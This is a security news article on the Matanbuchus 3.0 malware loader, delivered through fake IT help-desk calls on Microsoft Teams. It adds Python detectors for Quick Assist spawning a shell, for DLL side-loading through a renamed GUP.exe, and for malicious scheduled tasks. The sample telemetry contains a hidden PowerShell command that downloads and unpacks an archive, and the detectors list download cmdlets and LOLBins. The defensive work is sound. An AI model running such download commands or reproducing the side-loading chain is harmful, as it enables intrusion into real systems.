Morphisec said on Wednesday that a new version of the Matanbuchus malware loader is being distributed by phishing through Microsoft Teams, confirming that the well‑known Malware‑as‑a‑Service product has quietly evolved into a far more elusive threat. Researchers analysing the samples call the build “Matanbuchus 3.0,” describing it as a near‑total rewrite that relies on deeper in‑memory execution, heavier obfuscation and a revamped command‑and‑control protocol to keep detections low.
An advertisement posted to a Russian‑language crime forum on 7 July 2025 pitches the update at US $10,000 per month for the HTTPS flavour and US $15,000 for a DNS‑tunnel variant, up from the original 2021 rental fee of $2,500. Morphisec notes that it intercepted the loader in the wild days before the ad appeared, a sign that the new build was already circulating in trusted criminal circles before it was offered to a wider customer base.
Matanbuchus has served since 2021 as a conduit for ransomware operators and for repurposed red‑team tooling, ferrying Cobalt Strike beacons, QakBot, DanaBot and other second‑stage implants that often precede file‑encryption attacks. Its delivery methods have morphed from malicious MSI installers and drive‑by downloads on compromised websites to Google Drive links, malvertising and, most recently, socially engineered Microsoft Teams calls aimed at selected employees of high‑value companies.
In one incident this month a Morphisec customer received an external Teams call from attackers posing as an IT help‑desk crew. The callers persuaded staff to open Microsoft’s Quick Assist tool for remote troubleshooting, then walked them through a single‑line PowerShell command that fetched a ZIP archive. The bundle held a renamed copy of the Notepad++ updater (GUP.exe), a tampered XML configuration file and a malicious DLL that the updater side‑loaded, instantiating the Matanbuchus loader inside a legitimate, trusted binary. Because nothing arrives by mail and the first malicious code runs inside a signed host process, the approach sidesteps email filtering entirely and gives endpoint detection far less to work with.
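The delivery chain above leaves two detectable seams even when the DLL itself is well obfuscated: a remote‑assist process spawning a shell that downloads something, and a known side‑load host (the updater’s PE OriginalFileName is GUP.exe even after the file is renamed) running from a user‑writable directory and loading an unsigned DLL from that same directory. The Python below is an added example, not Morphisec’s or the article’s code; it runs those checks over constructed events modelled loosely on Sysmon process‑create and image‑load records. The field names, process and file names, paths, the download‑cmdlet list and the command line are all assumptions made for the illustration and would need tuning against real telemetry.

```python
import ntpath

# Assumed names for this illustration only; not rules from any vendor product.
QUICK_ASSIST = {"quickassist.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                    "start-bitstransfer", "curl ", "expand-archive")
SIDELOAD_HOSTS = {"gup.exe"}  # PE OriginalFileName of the Notepad++ updater
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _name(path):
    return ntpath.basename(path).lower()


def _trusted(path):
    return path.lower().startswith(TRUSTED_DIRS)


def detect(events):
    """Return findings as (severity, rule, pid) tuples, in event order."""
    procs = {}      # pid -> process_create event, to correlate later image loads
    findings = []
    for e in events:
        if e["type"] == "process_create":
            procs[e["pid"]] = e
            parent, image = _name(e["parent_image"]), _name(e["image"])
            cmd = e.get("command_line", "").lower()
            # Rule 1: a remote-assist session spawning a shell is the pivot point;
            # a download cmdlet on the command line raises it to high.
            if parent in QUICK_ASSIST and image in SHELLS:
                sev = "high" if any(m in cmd for m in DOWNLOAD_MARKERS) else "medium"
                findings.append((sev, "quick_assist_spawned_shell", e["pid"]))
            # Rule 2: a known side-load host that has been renamed or moved out
            # of a trusted install directory.
            orig = e.get("original_file_name", "").lower()
            if orig in SIDELOAD_HOSTS and (image != orig or not _trusted(e["image"])):
                findings.append(("medium", "relocated_sideload_host", e["pid"]))
        elif e["type"] == "image_load":
            host = procs.get(e["pid"])
            if host is None:
                continue
            orig = host.get("original_file_name", "").lower()
            loaded = e["image_loaded"]
            same_dir = (ntpath.dirname(host["image"]).lower()
                        == ntpath.dirname(loaded).lower())
            # Rule 3: the side-load host pulls an unsigned DLL from its own
            # untrusted directory, the classic side-loading signature.
            if (orig in SIDELOAD_HOSTS and same_dir
                    and not _trusted(loaded) and not e.get("signed", False)):
                findings.append(("high", "unsigned_dll_sideloaded", e["pid"]))
    return findings


# Constructed sample telemetry, not real events. Paths and names are invented.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4000, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Program Files\\WindowsApps\\QuickAssist\\QuickAssist.exe",
     "original_file_name": "QuickAssist.exe", "command_line": "QuickAssist.exe"},
    {"type": "process_create", "pid": 4100,
     "parent_image": "C:\\Program Files\\WindowsApps\\QuickAssist\\QuickAssist.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": "powershell -nop -w hidden -c \"iwr https://example.invalid/u.zip "
                     "-OutFile $env:TEMP\\u.zip; Expand-Archive $env:TEMP\\u.zip $env:TEMP\\upd\""},
    {"type": "process_create", "pid": 4200,
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\updater.exe",
     "original_file_name": "GUP.exe", "command_line": "updater.exe"},
    {"type": "image_load", "pid": 4200,
     "image_loaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\helper.dll", "signed": False},
    {"type": "image_load", "pid": 4200,
     "image_loaded": "C:\\Windows\\System32\\kernel32.dll", "signed": True},
    # Benign baseline: the genuine updater running from its install directory.
    {"type": "process_create", "pid": 5000,
     "parent_image": "C:\\Program Files\\Notepad++\\notepad++.exe",
     "image": "C:\\Program Files\\Notepad++\\updater\\GUP.exe",
     "original_file_name": "GUP.exe", "command_line": "GUP.exe -v8.7"},
    {"type": "image_load", "pid": 5000,
     "image_loaded": "C:\\Program Files\\Notepad++\\updater\\libcurl.dll", "signed": True},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding)
```

Rule 3 deliberately exempts loads from trusted install directories, so the genuine updater loading its own libraries from Program Files stays quiet while the same binary loading an unsigned DLL from a Temp folder does not; in practice you would also correlate by the ProcessGuid Sysmon provides rather than a bare PID, which can be reused.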
Version 3.0’s feature list reads like a catalogue of modern evasion: indirect system calls that route around user‑mode API hooks, Windows Management Instrumentation queries, support for WQL, CMD and PowerShell reverse shells, and the ability to drop or inject EXE, DLL, MSI or raw shellcode payloads. The loader watches running processes for security tools, checks its privilege level, and talks to its C2 over an encrypted channel before scheduling follow‑on tasks via COM object abuse—a tactic Morphisec’s Michael Gorelik says “manipulates the ITaskService in a way that most EDR engines simply don’t log.”
Once installed, Matanbuchus exfiltrates hardware and software inventories, pulls down additional payloads and establishes persistence, typically by launching its payloads through legitimate Windows binaries such as regsvr32, rundll32 or msiexec, or by hollowing a legitimate host process and running inside it. Those capabilities, combined with pricing that rivals top loader families like Bumblebee, position Matanbuchus 3.0 as a premium launchpad for ransomware crews including Black Basta, which already favour Teams‑based social engineering.
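Whether a task is registered through schtasks.exe or directly through the Schedule.Service COM interface that Gorelik describes, the result is the same task XML under the Task Scheduler store (and the same TaskContent in a Security 4698 event), so auditing that XML catches the persistence step even when the registration itself was not logged. The Python below is an added example, not code from Morphisec or the article: it parses the standard task XML schema and flags actions that run the living‑off‑the‑land binaries named above (regsvr32, rundll32, msiexec and a few others) or reference a user‑writable path, plus tasks marked hidden. The binary list, the path prefixes, the sample tasks and the helper names are assumptions made for this illustration.

```python
import ntpath
import os
import xml.etree.ElementTree as ET

# Task Scheduler's XML namespace (part of the public task schema).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed lists for this illustration; extend to taste for your environment.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "msiexec.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "\\appdata\\")


def audit_task(xml_text):
    """Return a list of hit labels for one task definition (empty if clean)."""
    root = ET.fromstring(xml_text)
    hits = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        name = ntpath.basename(cmd).lower()
        line = (cmd + " " + args).lower()
        # A task whose action is a LOLBin is how regsvr32/rundll32/msiexec
        # persistence shows up; the real payload is in the arguments.
        if name in LOLBINS:
            hits.append("lolbin_action:" + name)
        # Anything launched from, or pointed at, a user-writable location.
        if any(p in line for p in USER_WRITABLE):
            hits.append("user_writable_path")
    if root.findtext(".//t:Settings/t:Hidden", default="false", namespaces=NS).lower() == "true":
        hits.append("hidden_task")
    return hits


def audit_tasks_dir(tasks_dir=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store (UTF-16 XML files) and report flagged tasks."""
    results = {}
    for dirpath, _, files in os.walk(tasks_dir):
        for f in files:
            path = os.path.join(dirpath, f)
            try:
                with open(path, encoding="utf-16") as fh:
                    hits = audit_task(fh.read())
            except (OSError, ET.ParseError, UnicodeError):
                continue
            if hits:
                results[path] = hits
    return results


# Constructed sample task definitions, not captured from a real host.
SUSPICIOUS_TASK = """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>alice</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\rundll32.exe</Command>
      <Arguments>C:\\Users\\alice\\AppData\\Roaming\\svc\\core.dll,Start</Arguments>
    </Exec>
  </Actions>
</Task>
"""

BENIGN_TASK = """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\\Program Files\\Vendor\\Updater\\updater.exe"</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    print("suspicious:", audit_task(SUSPICIOUS_TASK))
    print("benign:", audit_task(BENIGN_TASK))
```

Run `audit_tasks_dir()` with an elevated prompt on a live host to sweep the whole store; a LOLBin action alone is not proof of compromise (plenty of vendor installers schedule msiexec), so treat the combination of LOLBin plus user‑writable path plus hidden flag as the signal worth chasing, and compare the task author and creation time against the Teams or Quick Assist session window.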
Security analysts say the rise of loaders that masquerade as business‑collaboration traffic—Zoom phishing and Slack token theft have also increased—underscores the need for strict verification policies around external chat requests and stronger monitoring of remote‑assist tools. As Gorelik puts it, “Matanbuchus 3.0 shows how little code attackers now need to touch disk before your EDR rings an alarm—by the time you hear it, the beacon is already calling home.”